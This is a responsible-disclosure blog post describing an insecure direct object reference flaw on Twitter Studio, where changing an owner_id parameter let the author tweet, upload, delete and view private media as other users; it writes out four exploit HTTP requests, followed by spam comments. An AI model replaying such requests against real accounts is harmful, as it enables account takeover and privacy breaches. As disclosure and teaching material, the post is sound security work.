How I took control of your Twitter account (tweeting, viewing/deleting photos and other media)

Summary:

This blog post is about an Insecure direct object reference vulnerability on Twitter which could have been used by attackers to tweet from other accounts, upload videos on behalf of user, delete pics/videos from victim's tweets, view private media uploaded by other twitter accounts etc. All endpoints on studio.twitter.com were vulnerable.

Description:

Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.

Twitter had launched a new product named Twitter Studio (studio.twitter.com) in September 2016. So i started looking out for security loopholes after the launch. All API requests on studio.twitter.com were sending a parameter named "owner_id" which was twitter user id(publicly available and sequential) of the logged in user. Owner_id parameter was missing authorisation checks changing which allowed me to take actions on behalf of other twitter users.

Vulnerable request #1 (Tweeting from other twitter accounts.)


POST /1/tweet.json HTTP/1.1
Host: studio.twitter.com {"account_id":"attacker's account id","owner_id":"victim's user id","metadata":
{"monetize":false,"embeddable_playback":false,"title":"Test tweet by attacker",
"description":"attacker attacker","cta_type":null,"cta_link":null},"media_key":"",
"text":"attacker attacker"}

Replaying above request with victim's id resulted in a tweet from victim's account.

Vulnerable request #2 (Upload Media from other's account)


POST /1/library/add.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's accountid","owner_id":"victim's id","metadata":{"monetize":false,"name":"abcd.png","embeddable_playback":true,"title":"Attacker","description":"","cta_type":null,"cta_link":null},"media_id":"","managed":false,"media_type":"TweetImage"}

Replaying above request with victim's owner_id, uploaded media from other user accounts.

Vulnerable request #3 (Delete Videos of other accounts)

POST /1/library/remove.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's id","media_key":"victim's video id"}

Replaying the above request with victim's user id and victim's media_key deleted media from victim's account.

Vulnerable request #4 (Private media disclosure)

GET /1/library/list.json?account_id=attacker's account id&owner_id=victim's id&limit=20&offset=0 HTTP/1.1
Host: studio.twitter.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://studio.twitter.com/library
Cookie: 
Connection: keep-alive


Replaying the above request with victim's user id and my account id leaked all private media's of victim's twitter account in response.


Video Proof of concept:

All tests were done on a friends account after taking permission. In the videos i am using my session cookies to tweet from another person's account (Sunil Bhati).

#1 Tweet from victim's account, Private media leakage 


#2 Delete media from victim's tweets

Timeline:
29th August - Reported all findings to twitter in 3 different reports as endpoints were different.
2nd September  - Received response from Twitter team saying we are looking into the issue and will be closing out other reports as duplicate as they share the same root cause i.e. missing owner_id check.
3rd September- Bounty of $5,040 rewarded by Twitter
3rd September- Pinged them to check if the report falls under "Core Twitter" category for bounty as it impacted Twitter.com. No response from them.




Comments

  1. Thank you for sharing them! I hope you will continue to have similar posts to share with everyone!
    html color

    ReplyDelete
  2. Interesting article! Thank you for sharing them! I hope you will continue to have similar posts to share with everyone!
    windows movie maker

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. That’s why we feel you much and services. It is very easy to finding us as we are at your city or nearest places. Just remember us and we will cash your check very short period with a very low cost.
    check cashing

    ReplyDelete
  5. Your article is very good and useful, thank you very much for this content.
    abcya

    ReplyDelete
  6. This is the information I am looking for. This article is clear and easy to understand. I'm learning more about this. Hope you bring more things related to it. Thanks a lot!
    wings io

    ReplyDelete
  7. Interesting article! Thank you for sharing them! I hope you will continue to have similar posts to share with everyone!
    html color

    ReplyDelete

Post a Comment

Popular posts from this blog

[Responsible disclosure] How I could have hacked all Facebook accounts

How anyone could have used Uber to ride for free!

[Responsible disclosure] How I could have removed all your Facebook notes